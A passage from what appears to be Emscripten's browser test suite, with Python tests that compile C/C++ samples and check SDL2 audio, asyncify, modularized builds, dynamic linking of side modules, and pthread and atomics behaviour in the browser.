self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2'])
@disabled('https://github.com/emscripten-core/emscripten/issues/13101')
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-s', 'ASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-s', 'ASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + ['-s', 'ASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=[sync_tunnel]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([WEBIDL_BINDER, test_file('webidl', 'test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
print('wasm in worker (we can read binary data synchronously there)')
create_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])
print('wasm (will auto-preload since no sync binary reading)')
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), assert_returncode=3,
args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# reffer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <thread>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
REPORT_RESULT(int(
side1_ptr == &side1 &&
side2_ptr == &side2
));
}).detach();
return 0;
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest(self.in_dir('main.cpp'), '1',
args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE', 'side1.wasm', 'side2.wasm'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-gsource-map', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking on insufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=3', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='-200', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(test_file('pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(test_file('pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(test_file('pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(test_file('pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(test_file('pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figure out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(test_file('pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(test_file('pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(test_file('pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(test_file('pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(test_file('pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(test_file('pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(test_file('pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread', 'test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(test_file('pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(test_file('pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(test_file('pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(test_file('pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(test_file('pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(test_file('pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(test_file('pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
